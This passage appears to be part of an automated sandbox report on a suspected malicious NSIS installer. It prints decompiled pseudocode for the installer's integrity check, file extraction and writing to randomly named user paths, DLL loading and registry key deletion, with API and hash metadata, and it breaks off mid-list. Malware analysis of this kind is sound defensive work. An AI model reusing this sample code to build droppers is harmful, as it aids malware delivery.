                                                            				 *0x40a018 = _t89;
                                                            				if(_t89 == 0xffffffff) {
                                                            					return "Error launching installer";
                                                            				}
                                                            				E00406257(0x481000, 0x489000);
                                                            				E00406257(0x48b000, E00405C30(0x481000));
                                                            				_t50 = GetFileSize(_t89, 0);
                                                            				 *0x43204c = _t50;
                                                            				_t93 = _t50;
                                                            				if(_t50 <= 0) {
                                                            					L24:
                                                            					E00402EA8(1);
                                                            					if( *0x452434 == _t82) {
                                                            						goto L29;
                                                            					}
                                                            					if(_v8 == _t82) {
                                                            						L28:
                                                            						_t94 = GlobalAlloc(0x40, _v24);
                                                            						E0040336B( *0x452434 + 0x1c);
                                                            						_push(_v24);
                                                            						_push(_t94);
                                                            						_push(_t82);
                                                            						_push(0xffffffff); // executed
                                                            						_t57 = E00403143(); // executed
                                                            						if(_t57 == _v24) {
                                                            							 *0x452430 = _t94;
                                                            							 *0x452438 =  *_t94;
                                                            							if((_v44 & 0x00000001) != 0) {
                                                            								 *0x45243c =  *0x45243c + 1;
                                                            							}
                                                            							_t40 = _t94 + 0x44; // 0x44
                                                            							_t59 = _t40;
                                                            							_t85 = 8;
                                                            							do {
                                                            								_t59 = _t59 - 8;
                                                            								 *_t59 =  *_t59 + _t94;
                                                            								_t85 = _t85 - 1;
                                                            							} while (_t85 != 0);
                                                            							_t60 = SetFilePointer(_v16, _t82, _t82, 1); // executed
                                                            							 *(_t94 + 0x3c) = _t60;
                                                            							E00405DA5(0x452440, _t94 + 4, 0x40);
                                                            							return 0;
                                                            						}
                                                            						goto L29;
                                                            					}
                                                            					E0040336B( *0x426040);
                                                            					if(E00403355( &_a4, 4) == 0 || _v12 != _a4) {
                                                            						goto L29;
                                                            					} else {
                                                            						goto L28;
                                                            					}
                                                            				} else {
                                                            					do {
                                                            						_t90 = _t93;
                                                            						asm("sbb eax, eax");
                                                            						_t70 = ( ~( *0x452434) & 0x00007e00) + 0x200;
                                                            						if(_t93 >= _t70) {
                                                            							_t90 = _t70;
                                                            						}
                                                            						if(E00403355(0x41e040, _t90) == 0) {
                                                            							E00402EA8(1);
                                                            							L29:
                                                            							return "Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
                                                            						}
                                                            						if( *0x452434 != 0) {
                                                            							if((_a4 & 0x00000002) == 0) {
                                                            								E00402EA8(0);
                                                            							}
                                                            							goto L20;
                                                            						}
                                                            						E00405DA5( &_v44, 0x41e040, 0x1c);
                                                            						_t77 = _v44;
                                                            						if((_t77 & 0xfffffff0) == 0 && _v40 == 0xdeadbeef && _v28 == 0x74736e49 && _v32 == 0x74666f73 && _v36 == 0x6c6c754e) {
                                                            							_a4 = _a4 | _t77;
                                                            							_t87 =  *0x426040; // 0xa399b
                                                            							 *0x4524c0 =  *0x4524c0 | _a4 & 0x00000002;
                                                            							_t80 = _v20;
                                                            							 *0x452434 = _t87;
                                                            							if(_t80 > _t93) {
                                                            								goto L29;
                                                            							}
                                                            							if((_a4 & 0x00000008) != 0 || (_a4 & 0x00000004) == 0) {
                                                            								_v8 = _v8 + 1;
                                                            								_t24 = _t80 - 4; // 0x5
                                                            								_t93 = _t24;
                                                            								if(_t90 > _t93) {
                                                            									_t90 = _t93;
                                                            								}
                                                            								goto L20;
                                                            							} else {
                                                            								break;
                                                            							}
                                                            						}
                                                            						L20:
                                                            						if(_t93 <  *0x43204c) {
                                                            							_v12 = E0040671A(_v12, 0x41e040, _t90);
                                                            						}
                                                            						 *0x426040 =  *0x426040 + _t90;
                                                            						_t93 = _t93 - _t90;
                                                            					} while (_t93 != 0);
                                                            					_t82 = 0;
                                                            					goto L24;
                                                            				}
                                                            			}




























                                                            APIs
                                                            • GetTickCount.KERNEL32(75572754,00485000,0047B000,?,?,004036FD,?,?,00000007,00000009,0000000B), ref: 00402F1D
                                                            • GetModuleFileNameA.KERNEL32(00000000,00489000,00002000,?,?,004036FD,?,?,00000007,00000009,0000000B), ref: 00402F39
                                                              • Part of subcall function 00405DEA: GetFileAttributesA.KERNELBASE(00000003,00402F4C,00489000,80000000,00000003,?,?,004036FD,?,?,00000007,00000009,0000000B), ref: 00405DEE
                                                              • Part of subcall function 00405DEA: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405E10
                                                            • GetFileSize.KERNEL32(00000000,00000000,0048B000,00000000,00481000,00481000,00489000,00489000,80000000,00000003,?,?,004036FD,?,?,00000007), ref: 00402F85
                                                            • GlobalAlloc.KERNEL32(00000040,00000007,?,?,004036FD,?,?,00000007,00000009,0000000B), ref: 004030BB
                                                            Strings
                                                            • Inst, xrefs: 00402FF1
                                                            • Error launching installer, xrefs: 00402F5C
                                                            • @A, xrefs: 00402F9A
                                                            • soft, xrefs: 00402FFA
                                                            • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 004030E2
                                                            • Null, xrefs: 00403003
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.1283301112.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                            • String ID: @A$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                                            • API String ID: 2803837635-2937945327
                                                            • Opcode ID: ef4c9a5dc92e0d7598bd923cfc77fc61e239af6537ea3ff3a5b4cfa1ca02d18f
                                                            • Instruction ID: 4581bf354a42e99e0fb2dd836479f673db23d0c593d329681b7c8fb4cfaa4e30
                                                            • Opcode Fuzzy Hash: ef4c9a5dc92e0d7598bd923cfc77fc61e239af6537ea3ff3a5b4cfa1ca02d18f
                                                            • Instruction Fuzzy Hash: E751B431901204ABDB20AF65DD85B9F7EACEB15356F20813BF501B62D2C7BC8E418B5D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            [Control-flow graph for function 403143; legend: Executed / Not Executed]
                                                            C-Code - Quality: 95%
                                                            			E00403143(int _a4, intOrPtr _a8, intOrPtr _a12, int _a16, signed char _a19) {
                                                            				signed int _v8;
                                                            				int _v12;
                                                            				intOrPtr _v16;
                                                            				long _v20;
                                                            				intOrPtr _v24;
                                                            				char _v88;
                                                            				void* _t65;
                                                            				long _t70;
                                                            				intOrPtr _t75;
                                                            				long _t76;
                                                            				intOrPtr _t77;
                                                            				void* _t78;
                                                            				int _t88;
                                                            				intOrPtr _t92;
                                                            				intOrPtr _t95;
                                                            				long _t96;
                                                            				signed int _t97;
                                                            				int _t98;
                                                            				int _t99;
                                                            				intOrPtr _t100;
                                                            				void* _t101;
                                                            				void* _t102;
                                                            
                                                            				_t97 = _a16;
                                                            				_t92 = _a12;
                                                            				_v12 = _t97;
                                                            				if(_t92 == 0) {
                                                            					_v12 = 0x8000;
                                                            				}
                                                            				_v8 = _v8 & 0x00000000;
                                                            				_v16 = _t92;
                                                            				if(_t92 == 0) {
                                                            					_v16 = 0x42a048;
                                                            				}
                                                            				_t62 = _a4;
                                                            				if(_a4 >= 0) {
                                                            					E0040336B( *0x452478 + _t62);
                                                            				}
                                                            				if(E00403355( &_a16, 4) == 0) {
                                                            					L41:
                                                            					_push(0xfffffffd);
                                                            					goto L42;
                                                            				} else {
                                                            					if((_a19 & 0x00000080) == 0) {
                                                            						if(_t92 != 0) {
                                                            							if(_a16 < _t97) {
                                                            								_t97 = _a16;
                                                            							}
                                                            							if(E00403355(_t92, _t97) != 0) {
                                                            								_v8 = _t97;
                                                            								L44:
                                                            								return _v8;
                                                            							} else {
                                                            								goto L41;
                                                            							}
                                                            						}
                                                            						if(_a16 <= _t92) {
                                                            							goto L44;
                                                            						}
                                                            						_t88 = _v12;
                                                            						while(1) {
                                                            							_t98 = _a16;
                                                            							if(_a16 >= _t88) {
                                                            								_t98 = _t88;
                                                            							}
                                                            							if(E00403355(0x426048, _t98) == 0) {
                                                            								goto L41;
                                                            							}
                                                            							if(E00405E91(_a8, 0x426048, _t98) == 0) {
                                                            								L28:
                                                            								_push(0xfffffffe);
                                                            								L42:
                                                            								_pop(_t65);
                                                            								return _t65;
                                                            							}
                                                            							_v8 = _v8 + _t98;
                                                            							_a16 = _a16 - _t98;
                                                            							if(_a16 > 0) {
                                                            								continue;
                                                            							}
                                                            							goto L44;
                                                            						}
                                                            						goto L41;
                                                            					}
                                                            					_t70 = GetTickCount();
                                                            					 *0x4149ac =  *0x4149ac & 0x00000000;
                                                            					 *0x4149a8 =  *0x4149a8 & 0x00000000;
                                                            					_t14 =  &_a16;
                                                            					 *_t14 = _a16 & 0x7fffffff;
                                                            					_v20 = _t70;
                                                            					 *0x414490 = 8;
                                                            					 *0x41e038 = 0x416030;
                                                            					 *0x41e034 = 0x416030;
                                                            					 *0x41e030 = 0x41e030;
                                                            					_a4 = _a16;
                                                            					if( *_t14 <= 0) {
                                                            						goto L44;
                                                            					} else {
                                                            						goto L9;
                                                            					}
                                                            					while(1) {
                                                            						L9:
                                                            						_t99 = 0x4000;
                                                            						if(_a16 < 0x4000) {
                                                            							_t99 = _a16;
                                                            						}
                                                            						if(E00403355(0x426048, _t99) == 0) {
                                                            							goto L41;
                                                            						}
                                                            						_a16 = _a16 - _t99;
                                                            						 *0x414480 = 0x426048;
                                                            						 *0x414484 = _t99;
                                                            						while(1) {
                                                            							_t95 = _v16;
                                                            							 *0x414488 = _t95;
                                                            							 *0x41448c = _v12;
                                                            							_t75 = E00406788("\xef\xbf\
                                                            							_v24 = _t75;
                                                            							if(_t75 < 0) {
                                                            								break;
                                                            							}
                                                            							_t100 =  *0x414488; // 0x42ce48
                                                            							_t101 = _t100 - _t95;
                                                            							_t76 = GetTickCount();
                                                            							_t96 = _t76;
                                                            							if(( *0x4524d4 & 0x00000001) != 0 && (_t76 - _v20 > 0xc8 || _a16 == 0)) {
                                                            								wsprintfA( &_v88, "... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
                                                            								_t102 = _t102 + 0xc;
                                                            								E00405378(0,  &_v88);
                                                            								_v20 = _t96;
                                                            							}
                                                            							if(_t101 == 0) {
                                                            								if(_a16 > 0) {
                                                            									goto L9;
                                                            								}
                                                            								goto L44;
                                                            							} else {
                                                            								if(_a12 != 0) {
                                                            									_t77 =  *0x414488; // 0x42ce48
                                                            									_v8 = _v8 + _t101;
                                                            									_v12 = _v12 - _t101;
                                                            									_v16 = _t77;
                                                            									L23:
                                                            									if(_v24 != 1) {
                                                            										continue;
                                                            									}
                                                            									goto L44;
                                                            								}
                                                            								_t78 = E00405E91(_a8, _v16, _t101); // executed
                                                            								if(_t78 == 0) {
                                                            									goto L28;
                                                            								}
                                                            								_v8 = _v8 + _t101;
                                                            								goto L23;
                                                            							}
                                                            						}
                                                            						_push(0xfffffffc);
                                                            						goto L42;
                                                            					}
                                                            					goto L41;
                                                            				}
                                                            			}


                                                            APIs
                                                            • GetTickCount.KERNEL32(000000FF,00000004,00000000,00000000,00000000), ref: 004031AA
                                                            • GetTickCount.KERNEL32({B,00426048,00004000), ref: 00403251
                                                            • MulDiv.KERNEL32 ref: 0040327A
                                                            • wsprintfA.USER32 ref: 0040328A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.1283301112.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: CountTick$wsprintf
                                                            • String ID: ... %d%%$0`A$H`B$H`B${B
                                                            • API String ID: 551687249-3260306330
                                                            • Opcode ID: 79b12083f63995c5a547f52dc9c231f5ffdbcf8cd1e0702b476da2877837ebcd
                                                            • Instruction ID: 5e435b9e5989c49516ab484f42c851a836a172a2bf0c70b81729303e7d6c5b04
                                                            • Opcode Fuzzy Hash: 79b12083f63995c5a547f52dc9c231f5ffdbcf8cd1e0702b476da2877837ebcd
                                                            • Instruction Fuzzy Hash: 59516A71801219AFDB10CFA5DA8479F7BA8AB45766F14817BEC01B72C0C7789A50CBA9
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph (function 00401759; legend: Executed, Not Executed)
                                                            C-Code - Quality: 75%
                                                            			E00401759(FILETIME* __ebx, void* __eflags) {
                                                            				void* _t33;
                                                            				void* _t41;
                                                            				void* _t43;
                                                            				FILETIME* _t49;
                                                            				FILETIME* _t62;
                                                            				void* _t64;
                                                            				signed int _t70;
                                                            				FILETIME* _t71;
                                                            				FILETIME* _t75;
                                                            				signed int _t77;
                                                            				void* _t80;
                                                            				CHAR* _t82;
                                                            				CHAR* _t83;
                                                            				void* _t85;
                                                            
                                                            				_t75 = __ebx;
                                                            				_t82 = E00402C39(0x31);
                                                            				 *(_t85 - 8) = _t82;
                                                            				 *(_t85 + 8) =  *(_t85 - 0x28) & 0x00000007;
                                                            				_t33 = E00405C56(_t82);
                                                            				_push(_t82);
                                                            				_t83 = "C:\\Users\\Albus\\Raped\\Forbundskansleres.nav";
                                                            				if(_t33 == 0) {
                                                            					lstrcatA(E00405BE9(E00406257(_t83, "C:\\Users\\Albus\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Drukneddens\\Bruckled\\Kededes")), ??);
                                                            				} else {
                                                            					E00406257();
                                                            				}
                                                            				E00406535(_t83);
                                                            				while(1) {
                                                            					__eflags =  *(_t85 + 8) - 3;
                                                            					if( *(_t85 + 8) >= 3) {
                                                            						_t64 = E004065CE(_t83);
                                                            						_t77 = 0;
                                                            						__eflags = _t64 - _t75;
                                                            						if(_t64 != _t75) {
                                                            							_t71 = _t64 + 0x14;
                                                            							__eflags = _t71;
                                                            							_t77 = CompareFileTime(_t71, _t85 - 0x1c);
                                                            						}
                                                            						asm("sbb eax, eax");
                                                            						_t70 =  ~(( *(_t85 + 8) + 0xfffffffd | 0x80000000) & _t77) + 1;
                                                            						__eflags = _t70;
                                                            						 *(_t85 + 8) = _t70;
                                                            					}
                                                            					__eflags =  *(_t85 + 8) - _t75;
                                                            					if( *(_t85 + 8) == _t75) {
                                                            						E00405DC5(_t83);
                                                            					}
                                                            					__eflags =  *(_t85 + 8) - 1;
                                                            					_t41 = E00405DEA(_t83, 0x40000000, (0 |  *(_t85 + 8) != 0x00000001) + 1);
                                                            					__eflags = _t41 - 0xffffffff;
                                                            					 *(_t85 - 0xc) = _t41;
                                                            					if(_t41 != 0xffffffff) {
                                                            						break;
                                                            					}
                                                            					__eflags =  *(_t85 + 8) - _t75;
                                                            					if( *(_t85 + 8) != _t75) {
                                                            						E00405378(0xffffffe2,  *(_t85 - 8));
                                                            						__eflags =  *(_t85 + 8) - 2;
                                                            						if(__eflags == 0) {
                                                            							 *((intOrPtr*)(_t85 - 4)) = 1;
                                                            						}
                                                            						L31:
                                                            						 *0x4524a8 =  *0x4524a8 +  *((intOrPtr*)(_t85 - 4));
                                                            						__eflags =  *0x4524a8;
                                                            						goto L32;
                                                            					} else {
                                                            						E00406257(0x40e438, 0x453000);
                                                            						E00406257(0x453000, _t83);
                                                            						E004062EA(_t75, 0x40e438, _t83, "C:\Users\Albus\Pictures\Ray\Sorghos.Rei",  *((intOrPtr*)(_t85 - 0x14)));
                                                            						E00406257(0x453000, 0x40e438);
                                                            						_t62 = E0040596D("C:\Users\Albus\Pictures\Ray\Sorghos.Rei",  *(_t85 - 0x28) >> 3) - 4;
                                                            						__eflags = _t62;
                                                            						if(_t62 == 0) {
                                                            							continue;
                                                            						} else {
                                                            							__eflags = _t62 == 1;
                                                            							if(_t62 == 1) {
                                                            								 *0x4524a8 =  &( *0x4524a8->dwLowDateTime);
                                                            								L32:
                                                            								_t49 = 0;
                                                            								__eflags = 0;
                                                            							} else {
                                                            								_push(_t83);
                                                            								_push(0xfffffffa);
                                                            								E00405378();
                                                            								L29:
                                                            								_t49 = 0x7fffffff;
                                                            							}
                                                            						}
                                                            					}
                                                            					L33:
                                                            					return _t49;
                                                            				}
                                                            				E00405378(0xffffffea,  *(_t85 - 8));
                                                            				 *0x4524d4 =  *0x4524d4 + 1;
                                                            				_t43 = E00403143( *((intOrPtr*)(_t85 - 0x20)),  *(_t85 - 0xc), _t75, _t75); // executed
                                                            				 *0x4524d4 =  *0x4524d4 - 1;
                                                            				__eflags =  *(_t85 - 0x1c) - 0xffffffff;
                                                            				_t80 = _t43;
                                                            				if( *(_t85 - 0x1c) != 0xffffffff) {
                                                            					L22:
                                                            					SetFileTime( *(_t85 - 0xc), _t85 - 0x1c, _t75, _t85 - 0x1c);
                                                            				} else {
                                                            					__eflags =  *((intOrPtr*)(_t85 - 0x18)) - 0xffffffff;
                                                            					if( *((intOrPtr*)(_t85 - 0x18)) != 0xffffffff) {
                                                            						goto L22;
                                                            					}
                                                            				}
                                                            				CloseHandle( *(_t85 - 0xc)); // executed
                                                            				__eflags = _t80 - _t75;
                                                            				if(_t80 >= _t75) {
                                                            					goto L31;
                                                            				} else {
                                                            					__eflags = _t80 - 0xfffffffe;
                                                            					if(_t80 != 0xfffffffe) {
                                                            						E004062EA(_t75, _t80, _t83, _t83, 0xffffffee);
                                                            					} else {
                                                            						E004062EA(_t75, _t80, _t83, _t83, 0xffffffe9);
                                                            						lstrcatA(_t83,  *(_t85 - 8));
                                                            					}
                                                            					_push(0x200010);
                                                            					_push(_t83);
                                                            					E0040596D();
                                                            					goto L29;
                                                            				}
                                                            				goto L33;
                                                            			}

                                                            APIs
                                                            • lstrcatA.KERNEL32(00000000,00000000,C:\Users\user\Raped\Forbundskansleres.nav,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Drukneddens\Bruckled\Kededes,00000000,00000000,00000031), ref: 00401798
                                                            • CompareFileTime.KERNEL32(-00000014,?,C:\Users\user\Raped\Forbundskansleres.nav,C:\Users\user\Raped\Forbundskansleres.nav,00000000,00000000,C:\Users\user\Raped\Forbundskansleres.nav,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Drukneddens\Bruckled\Kededes,00000000,00000000,00000031), ref: 004017C2
                                                              • Part of subcall function 00406257: lstrcpynA.KERNEL32(0000000B,0000000B,00002000,00403556,0044E420,NSIS Error,?,00000007,00000009,0000000B), ref: 00406264
                                                              • Part of subcall function 00405378: lstrlenA.KERNEL32(Copy failed,00000000,0042CE48,7555110C,?,?,?,?,?,?,?,?,?,0040329E,00000000,?), ref: 004053B1
                                                              • Part of subcall function 00405378: lstrlenA.KERNEL32(0040329E,Copy failed,00000000,0042CE48,7555110C,?,?,?,?,?,?,?,?,?,0040329E,00000000), ref: 004053C1
                                                              • Part of subcall function 00405378: lstrcatA.KERNEL32(Copy failed,0040329E,0040329E,Copy failed,00000000,0042CE48,7555110C), ref: 004053D4
                                                              • Part of subcall function 00405378: SetWindowTextA.USER32(Copy failed,Copy failed), ref: 004053E6
                                                              • Part of subcall function 00405378: SendMessageA.USER32 ref: 0040540C
                                                              • Part of subcall function 00405378: SendMessageA.USER32 ref: 00405426
                                                              • Part of subcall function 00405378: SendMessageA.USER32 ref: 00405434
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.1283301112.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                            • String ID: 8@$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Drukneddens\Bruckled\Kededes$C:\Users\user\Pictures\Ray\Sorghos.Rei$C:\Users\user\Raped\Forbundskansleres.nav
                                                            • API String ID: 1941528284-2731853383
                                                            • Opcode ID: 17a4ae110c0ca27f03c3979ff1c6c9ce433cce4c94a9e24745227020a4c7ece8
                                                            • Instruction ID: 3e968e9bdc471329156ed959ca9c7b0cca39a402a35bfbb3b78bbd1fa7da6ddf
                                                            • Opcode Fuzzy Hash: 17a4ae110c0ca27f03c3979ff1c6c9ce433cce4c94a9e24745227020a4c7ece8
                                                            • Instruction Fuzzy Hash: F341D471900215BBCB207BB5CD45DAF7679EF45369B20823FF422B20E2D77C8A518A6D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 926 405378-40538d 927 405443-405447 926->927 928 405393-4053a5 926->928 929 4053b0-4053bc lstrlenA 928->929 930 4053a7-4053ab call 4062ea 928->930 932 4053d9-4053dd 929->932 933 4053be-4053ce lstrlenA 929->933 930->929 935 4053ec-4053f0 932->935 936 4053df-4053e6 SetWindowTextA 932->936 933->927 934 4053d0-4053d4 lstrcatA 933->934 934->932 937 4053f2-405434 SendMessageA * 3 935->937 938 405436-405438 935->938 936->935 937->938 938->927 939 40543a-40543d 938->939 939->927
                                                            C-Code - Quality: 100%
                                                            			E00405378(CHAR* _a4, CHAR* _a8) {
                                                            				struct HWND__* _v8;
                                                            				signed int _v12;
                                                            				CHAR* _v32;
                                                            				long _v44;
                                                            				int _v48;
                                                            				void* _v52;
                                                            				void* __ebx;
                                                            				void* __edi;
                                                            				void* __esi;
                                                            				CHAR* _t26;
                                                            				signed int _t27;
                                                            				CHAR* _t28;
                                                            				long _t29;
                                                            				signed int _t39;
                                                            
                                                            				_t26 =  *0x44e404;
                                                            				_v8 = _t26;
                                                            				if(_t26 != 0) {
                                                            					_t27 =  *0x4524d4;
                                                            					_v12 = _t27;
                                                            					_t39 = _t27 & 0x00000001;
                                                            					if(_t39 == 0) {
                                                            						E004062EA(0, _t39, 0x438070, 0x438070, _a4);
                                                            					}
                                                            					_t26 = lstrlenA(0x438070);
                                                            					_a4 = _t26;
                                                            					if(_a8 == 0) {
                                                            						L6:
                                                            						if((_v12 & 0x00000004) == 0) {
                                                            							_t26 = SetWindowTextA( *0x44e3e8, 0x438070); // executed
                                                            						}
                                                            						if((_v12 & 0x00000002) == 0) {
                                                            							_v32 = 0x438070;
                                                            							_v52 = 1;
                                                            							_t29 = SendMessageA(_v8, 0x1004, 0, 0); // executed
                                                            							_v44 = 0;
                                                            							_v48 = _t29 - _t39;
                                                            							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52); // executed
                                                            							_t26 = SendMessageA(_v8, 0x1013, _v48, 0); // executed
                                                            						}
                                                            						if(_t39 != 0) {
                                                            							_t28 = _a4;
                                                            							 *((char*)(_t28 + 0x438070)) = 0;
                                                            							return _t28;
                                                            						}
                                                            					} else {
                                                            						_t26 =  &(_a4[lstrlenA(_a8)]);
                                                            						if(_t26 < 0x4000) {
                                                            							_t26 = lstrcatA(0x438070, _a8);
                                                            							goto L6;
                                                            						}
                                                            					}
                                                            				}
                                                            				return _t26;
                                                            			}


















                                                            APIs
                                                            • lstrlenA.KERNEL32(Copy failed,00000000,0042CE48,7555110C,?,?,?,?,?,?,?,?,?,0040329E,00000000,?), ref: 004053B1
                                                            • lstrlenA.KERNEL32(0040329E,Copy failed,00000000,0042CE48,7555110C,?,?,?,?,?,?,?,?,?,0040329E,00000000), ref: 004053C1
                                                            • lstrcatA.KERNEL32(Copy failed,0040329E,0040329E,Copy failed,00000000,0042CE48,7555110C), ref: 004053D4
                                                            • SetWindowTextA.USER32(Copy failed,Copy failed), ref: 004053E6
                                                            • SendMessageA.USER32 ref: 0040540C
                                                            • SendMessageA.USER32 ref: 00405426
                                                            • SendMessageA.USER32 ref: 00405434
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.1283301112.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                            • String ID: Copy failed
                                                            • API String ID: 2531174081-2810831833
                                                            • Opcode ID: 43b59e8548ca3e8478251fdd04fd0e5e98560b6af6290137ab004f16df5a9164
                                                            • Instruction ID: 37f28695abd5d6743d555213097846b75af7b366b005b624e269435409e9a681
                                                            • Opcode Fuzzy Hash: 43b59e8548ca3e8478251fdd04fd0e5e98560b6af6290137ab004f16df5a9164
                                                            • Instruction Fuzzy Hash: 78218C71D00208BBDB11AFA5DD84ADEBFB9EF05354F14807AF904B6291C7798E808F98
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 940 4065f5-406615 GetSystemDirectoryA 941 406617 940->941 942 406619-40661b 940->942 941->942 943 40662b-40662d 942->943 944 40661d-406625 942->944 946 40662e-406660 wsprintfA LoadLibraryExA 943->946 944->943 945 406627-406629 944->945 945->946
                                                            C-Code - Quality: 100%
                                                            			E004065F5(intOrPtr _a4) {
                                                            				char _v292;
                                                            				int _t10;
                                                            				struct HINSTANCE__* _t14;
                                                            				void* _t16;
                                                            				void* _t21;
                                                            
                                                            				_t10 = GetSystemDirectoryA( &_v292, 0x104);
                                                            				if(_t10 > 0x104) {
                                                            					_t10 = 0;
                                                            				}
                                                            				if(_t10 == 0 ||  *((char*)(_t21 + _t10 - 0x121)) == 0x5c) {
                                                            					_t16 = 1;
                                                            				} else {
                                                            					_t16 = 0;
                                                            				}
                                                            				_t5 = _t16 + 0x40a014; // 0x5c
                                                            				wsprintfA(_t21 + _t10 - 0x120, "%s%s.dll", _t5, _a4);
                                                            				_t14 = LoadLibraryExA( &_v292, 0, 8); // executed
                                                            				return _t14;
                                                            			}









                                                            APIs
                                                            • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0040660C
                                                            • wsprintfA.USER32 ref: 00406645
                                                            • LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 00406659
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.1283301112.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: DirectoryLibraryLoadSystemwsprintf
                                                            • String ID: %s%s.dll$UXTHEME$\
                                                            • API String ID: 2200240437-4240819195
                                                            • Opcode ID: 265ca81b40b881dab18d3809a90e9c8d4eed5c2f9756e13f598d1e00e091b07b
                                                            • Instruction ID: 9f789840e0b15416ae64874b5c60068ae2f650887ed5db1015d4ebb1f4ad26b2
                                                            • Opcode Fuzzy Hash: 265ca81b40b881dab18d3809a90e9c8d4eed5c2f9756e13f598d1e00e091b07b
                                                            • Instruction Fuzzy Hash: 12F0213051060A67DB14A764DD0DFFB3B5CEB08304F14047EA586F10C1DAB9D5358B5D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 947 402d3b-402d64 call 4060dd 949 402d69-402d6d 947->949 950 402d73-402d77 949->950 951 402e1e-402e22 949->951 952 402d79-402d9a RegEnumValueA 950->952 953 402d9c-402daf 950->953 952->953 955 402e03-402e11 RegCloseKey 952->955 954 402dd8-402ddf RegEnumKeyA 953->954 956 402db1-402db3 954->956 957 402de1-402df3 RegCloseKey call 406663 954->957 955->951 956->955 958 402db5-402dc9 call 402d3b 956->958 963 402e13-402e19 957->963 964 402df5-402e01 RegDeleteKeyA 957->964 958->957 965 402dcb-402dd7 958->965 963->951 964->951 965->954
                                                            C-Code - Quality: 48%
                                                            			E00402D3B(void* __eflags, void* _a4, char* _a8, signed int _a12) {
                                                            				void* _v8;
                                                            				int _v12;
                                                            				char _v276;
                                                            				void* _t27;
                                                            				signed int _t33;
                                                            				intOrPtr* _t35;
                                                            				signed int _t45;
                                                            				signed int _t46;
                                                            				signed int _t47;
                                                            
                                                            				_t46 = _a12;
                                                            				_t47 = _t46 & 0x00000300;
                                                            				_t45 = _t46 & 0x00000001;
                                                            				_t27 = E004060DD(__eflags, _a4, _a8, _t47 | 0x00000009,  &_v8); // executed
                                                            				if(_t27 == 0) {
                                                            					if((_a12 & 0x00000002) == 0) {
                                                            						L3:
                                                            						_push(0x105);
                                                            						_push( &_v276);
                                                            						_push(0);
                                                            						while(RegEnumKeyA(_v8, ??, ??, ??) == 0) {
                                                            							__eflags = _t45;
                                                            							if(__eflags != 0) {
                                                            								L10:
                                                            								RegCloseKey(_v8);
                                                            								return 0x3eb;
                                                            							}
                                                            							_t33 = E00402D3B(__eflags, _v8,  &_v276, _a12);
                                                            							__eflags = _t33;
                                                            							if(_t33 != 0) {
                                                            								break;
                                                            							}
                                                            							_push(0x105);
                                                            							_push( &_v276);
                                                            							_push(_t45);
                                                            						}
                                                            						RegCloseKey(_v8);
                                                            						_t35 = E00406663(3);
                                                            						if(_t35 != 0) {
                                                            							return  *_t35(_a4, _a8, _t47, 0);
                                                            						}
                                                            						return RegDeleteKeyA(_a4, _a8);
                                                            					}
                                                            					_v12 = 0;
                                                            					if(RegEnumValueA(_v8, 0,  &_v276,  &_v12, 0, 0, 0, 0) != 0x103) {
                                                            						goto L10;
                                                            					}
                                                            					goto L3;
                                                            				}
                                                            				return _t27;
                                                            			}













                                                            APIs
                                                            • RegEnumValueA.ADVAPI32 ref: 00402D8F
                                                            • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402DDB
                                                            • RegCloseKey.ADVAPI32(?), ref: 00402DE4
